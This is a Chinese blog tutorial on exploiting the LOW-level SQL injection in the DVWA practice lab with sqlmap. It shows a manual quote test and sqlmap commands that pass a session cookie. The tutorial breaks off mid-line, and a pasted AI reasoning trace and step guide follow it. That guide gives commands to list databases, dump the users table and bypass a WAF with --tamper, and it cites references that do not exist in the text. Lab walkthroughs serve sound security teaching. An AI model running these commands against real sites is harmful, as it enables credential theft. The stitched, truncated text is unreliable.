DVWA之LOW级别SQL注入---SQLMap使用

本文介绍了如何利用SQLMap工具检测和利用DVWA中的LOW级别SQL注入漏洞。通过输入测试数据确定存在注入后,使用SQLMap进行一系列操作,包括识别数据库类型、获取数据库名、查看表及列信息,并最终通过字典攻击获取用户密码。

看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。

SQLMap之dvwa简单使用实例:

一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回

ID: 1
First name: admin
Surname: admin

返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞,下面利用SQLMap进行注入攻击。

二、利用SQLMap工具

<①>

python sqlmap.py -u "localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"

    # -u " "参数--URL,进行测试,
        # 提示:

sqlmap got a 302 redirect to 'http://localhost:82/DVWA-master/login.php'. Do you want to follow? [Y/n]

     # (SqLMAP得到302重定向到“http://LoalHoo:/DVWAuthMistal/Logial.php”。你想跟上吗?[y/n])
        # 根据该提示,可以判断(302重定向)跳转至登录页面,看来需要带cookie

python sqlmap.py -u "localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "F12→→Console→→document.cookie得到当前页面cookie"

    # 得到数据库类型版本(MySQL),服务器类型版本(Apache,PHP)
        # the back-end DBMS is MySQL           &n

<think>嗯,用户想用sqlmapDVWA进行SQL注入测试。首先,我得回忆一下DVWA的配置。DVWA是一个漏洞测试环境,通常需要PHP服务器支持,比如用XAMPP或者phpStudy。用户可能需要先确保DVWA已经正确安装,并且能通过浏览器访问。 接下来,用户需要使用sqlmap,这是一个自动化的SQL注入工具。根据引用中的信息,用户需要获取目标URL和cookie。因为DVWASQL注入页面可能需要登录,所以cookie是必须的。比如引用[3]提到,打开DVWA主页后进入SQL注入页面,然后获取cookie。这一步很重要,否则sqlmap可能无法正确访问受保护的页面。 然后,构造sqlmap命令。用户需要指定目标URL,带上cookie参数,这样才能通过身份验证。例如,引用[1]和[5]中的命令格式是:sqlmap -u "URL" --cookie="..."。这里要注意URL中的参数是否正确,比如id=1可能存在注入点。另外,可能需要处理特殊字符,比如&符号在命令行中需要转义或者用引号包裹。 如果出现404错误或者测试页面返回问题,引用[2]建议重置DVWA或重启phpStudy,这可能是由于会话过期或服务未运行导致的。用户可能需要检查服务状态,或者重新登录DVWA获取新的cookie。 接下来,用户可能需要枚举数据库、表、列等。引用[4]展示了如何获取数据库表名,使用-D参数指定数据库,--tables枚举表。这需要用户逐步执行命令,先获取数据库列表,再选择目标数据库,进一步获取表结构。 用户可能遇到的问题包括:cookie获取不正确,URL构造错误,或者DVWA的安全等级设置。DVWA的安全等级分为low、medium、high等,不同等级可能需要不同的注入方式。例如,low级别可能更容易注入,而high级别可能需要更复杂的绕过技术。所以用户需要确认DVWA的安全等级设置为low,如引用中提到的--cookie="security=low"。 此外,使用--batch参数可以让sqlmap自动选择默认选项,减少交互步骤,适合新手。但用户需要注意,某些情况下可能需要手动确认选项,比如当sqlmap检测到可能的注入点但不确定时。 总结步骤应该是:准备环境,获取URL和cookie,执行sqlmap命令逐步注入,处理可能出现的错误,如404或会话问题。同时,根据引用中的示例命令,用户需要替换为自己的IP地址、PHPSESSID等信息,确保命令正确执行。 最后,用户可能需要了解如何利用注入后的数据,比如获取用户凭证或其他敏感信息。不过,根据问题描述,用户目前的需求是测试注入攻击,因此重点应放在如何正确配置和使用sqlmap上。</think>以下是使用sqlmapDVWA进行SQL注入攻击测试的步骤指南: ### 一、环境准备 1. 确保DVWA已部署在PHP环境(如XAMPP/phpStudy)中,且安全级别设置为`low`[^3] 2. 确认Kali Linux已安装sqlmap工具(默认自带) ### 二、获取关键信息 1. 访问DVWASQL注入页面: $$http://[靶机IP]/dvwa/vulnerabilities/sqli/$$ 2. 按F12打开开发者工具,在存储标签页获取Cookie值(包含`security`和`PHPSESSID`)[^3] ### 三、注入命令示例 ```bash sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="security=low; PHPSESSID=your_session_id" \ --batch ``` *注意:IP地址和PHPSESSID需替换为实际值,参数中的`&`需转义为`\&`或包裹在引号中[^1]* ### 四、进阶操作 1. **获取数据库列表**: ```bash sqlmap [...] --dbs ``` 2. **获取指定数据库表名**: ```bash sqlmap [...] -D dvwa --tables ``` 3. **提取用户表数据**: ```bash sqlmap [...] -D dvwa -T users --dump ``` ### 五、常见问题处理 - **404错误**:检查DVWA服务状态,重启phpStudy/XAMPP[^2] - **会话失效**:重新登录DVWA获取新PHPSESSID - **WAF拦截**:尝试使用`--tamper`参数绕过防护
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值